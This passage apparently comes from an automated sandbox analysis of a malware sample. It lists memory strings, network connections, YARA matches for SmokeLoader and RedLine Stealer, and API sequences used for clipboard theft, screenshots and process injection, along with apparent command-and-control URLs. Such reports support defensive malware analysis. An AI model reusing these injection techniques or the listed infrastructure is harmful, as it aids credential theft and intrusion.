                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: JKEBFB.12.drString found in binary or memory: https://support.mozilla.org
                    Source: JKEBFB.12.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: JKEBFB.12.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                    Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/
                    Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/D
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/H
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/api
                    Source: 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/apiF
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/n
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: JKEBFB.12.drString found in binary or memory: https://www.mozilla.org
                    Source: JKEBFB.12.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                    Source: JKEBFB.12.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                    Source: JKEBFB.12.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398671914.000000001E434000.00000004.00000020.00020000.00000000.sdmp, JKEBFB.12.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53098 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53071 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53094 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53103 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53089
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53107 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53094
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53089 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53099
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53100 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53098
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53085 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53066 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53091 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53112 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53074 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53099 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53110 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53102 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53106 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53066
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53088 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53113 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53109
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53108
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53111 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53077 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53103
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53102
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53068
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53101 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53101
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53107
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53105 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53106
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53105
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53104
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53109 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53087 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53071
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53077
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53110
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53076
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53074
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53114 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53108 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53097 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53076 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53068 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53114
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53113
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53112
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53111
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53086 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53082
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53088
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53082 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53086
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53085
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0042EAB0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0042EAB0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,7_2_0042EC90
                    Source: Yara matchFile source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401615
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401658
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401620
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401524
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040162D
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401635
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401615
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401658
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,6_2_00403406
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401620
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401524
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040162D
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401635
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_04279B10 NtProtectVirtualMemory,NtProtectVirtualMemory,11_2_04279B10
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,11_2_0427A4F0
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_04279850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,11_2_04279850
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004273537_2_00427353
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004208807_2_00420880
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004049707_2_00404970
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0041FD107_2_0041FD10
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0043B0507_2_0043B050
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004261747_2_00426174
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004061F07_2_004061F0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004262847_2_00426284
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004223B87_2_004223B8
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004054407_2_00405440
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0040F4007_2_0040F400
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004164D27_2_004164D2
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004334807_2_00433480
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004035707_2_00403570
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004215807_2_00421580
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004016E07_2_004016E0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004067B07_2_004067B0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_004089A07_2_004089A0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_00421C717_2_00421C71
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_00425CEE7_2_00425CEE
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_00440D367_2_00440D36
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0043AD307_2_0043AD30
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_00407DF07_2_00407DF0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_00404EF07_2_00404EF0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_00435EB07_2_00435EB0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_00403F807_2_00403F80
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021212677_2_02121267
